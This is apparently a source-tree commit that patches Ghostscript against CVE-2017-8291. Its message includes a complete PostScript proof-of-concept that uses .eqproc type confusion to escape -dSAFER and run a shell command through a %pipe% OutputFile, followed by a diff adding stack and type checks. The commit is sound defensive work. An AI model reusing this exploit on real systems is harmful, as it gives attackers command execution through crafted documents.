gs: apply mitigations against CVE-2017-8291 (thanks jsmoody)

To reproduce:
gs -q -dNOPAUSE -dSAFER '-sDEVICE=ppmraw' '-sOutputFile=/dev/null' <<.
%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100


/size_from  10000      def
/size_step    500      def
/size_to   65000      def
/enlarge    1000      def

%/bigarr 65000 array def

0
size_from size_step size_to {
    pop
    1 add
} for

/buffercount exch def

/buffersizes buffercount array def


0
size_from size_step size_to {
    buffersizes exch 2 index exch put
    1 add
} for
pop

/buffers buffercount array def

0 1 buffercount 1 sub {
    /ind exch def
    buffersizes ind get /cursize exch def
    cursize string /curbuf exch def
    buffers ind curbuf put
    cursize 16 sub 1 cursize 1 sub {
        curbuf exch 255 put
    } for
} for


/buffersearchvars [0 0 0 0 0] def
/sdevice [0] def

enlarge array aload

{
    .eqproc
    buffersearchvars 0 buffersearchvars 0 get 1 add put
    buffersearchvars 1 0 put
    buffersearchvars 2 0 put
    buffercount {
        buffers buffersearchvars 1 get get
        buffersizes buffersearchvars 1 get get
        16 sub get
        254 le {
            buffersearchvars 2 1 put
            buffersearchvars 3 buffers buffersearchvars 1 get get put
            buffersearchvars 4 buffersizes buffersearchvars 1 get get 16 sub put
        } if
        buffersearchvars 1 buffersearchvars 1 get 1 add put
    } repeat

    buffersearchvars 2 get 1 ge {
        exit
    } if
    %(.) print
} loop

.eqproc
.eqproc
.eqproc
sdevice 0
currentdevice
buffersearchvars 3 get buffersearchvars 4 get 16#7e put
buffersearchvars 3 get buffersearchvars 4 get 1 add 16#12 put
buffersearchvars 3 get buffersearchvars 4 get 5 add 16#ff put
put


buffersearchvars 0 get array aload

sdevice 0 get
16#3e8 0 put

sdevice 0 get
16#3b0 0 put

sdevice 0 get
16#3f0 0 put


currentdevice null false mark /OutputFile (%pipe%echo gotce)
.putdeviceparams
1 true .outputpage
.rsdparams
%{ } loop
0 0 .quit
%asdf

.

2 files changed, 21 insertions, 7 deletions

diff --git a/sys/src/cmd/gs/src/zfrsd.c b/sys/src/cmd/gs/src/zfrsd.c
index ddff62162..17d3fb78a 100644
--- a/sys/src/cmd/gs/src/zfrsd.c
+++ b/sys/src/cmd/gs/src/zfrsd.c
@@ -47,13 +47,19 @@ zrsdparams(i_ctx_t *i_ctx_p)
     ref *pFilter;
     ref *pDecodeParms;
     int Intent;
-    bool AsyncRead;
+    bool AsyncRead = false;
     ref empty_array, filter1_array, parms1_array;
     uint i;
-    int code;
+    int code = 0;
+
+    if (ref_stack_count(&o_stack) < 1)
+        return_error(e_stackunderflow);
+    if (!r_has_type(op, t_dictionary) && !r_has_type(op, t_null))
+         return_error(e_typecheck);
 
     make_empty_array(&empty_array, a_readonly);
-    if (dict_find_string(op, "Filter", &pFilter) > 0) {
+    if (r_has_type(op, t_dictionary)
+        && dict_find_string(op, "Filter", &pFilter) > 0) {
 	if (!r_is_array(pFilter)) {
 	    if (!r_has_type(pFilter, t_name))
 		return_error(e_typecheck);
@@ -92,10 +98,12 @@ zrsdparams(i_ctx_t *i_ctx_p)
 		return_error(e_typecheck);
 	}
     }
-    if ((code = dict_int_param(op, "Intent", 0, 3, 0, &Intent)) < 0 ||
-	(code = dict_bool_param(op, "AsyncRead", false, &AsyncRead)) < 0
-	)
-	return code;
+    if (r_has_type(op, t_dictionary))
+        code = dict_int_param(op, "Intent", 0, 3, 0, &Intent);
+
+    if (r_has_type(op, t_dictionary))
+        if ((code = dict_bool_param(op, "AsyncRead", false, &AsyncRead)) < 0)
+            return code;
     push(1);
     op[-1] = *pFilter;
     if (pDecodeParms)
diff --git a/sys/src/cmd/gs/src/zmisc3.c b/sys/src/cmd/gs/src/zmisc3.c
index 228932476..e9f056de6 100644
--- a/sys/src/cmd/gs/src/zmisc3.c
+++ b/sys/src/cmd/gs/src/zmisc3.c
@@ -55,6 +55,12 @@ zeqproc(i_ctx_t *i_ctx_p)
     ref2_t stack[MAX_DEPTH + 1];
     ref2_t *top = stack;
 
+    if (ref_stack_count(&o_stack) < 2)
+        return_error(e_stackunderflow);
+    if (!r_is_array(op - 1) || !r_is_array(op)) {
+        return_error(e_typecheck);
+    }
+
     make_array(&stack[0].proc1, 0, 1, op - 1);
     make_array(&stack[0].proc2, 0, 1, op);
     for (;;) {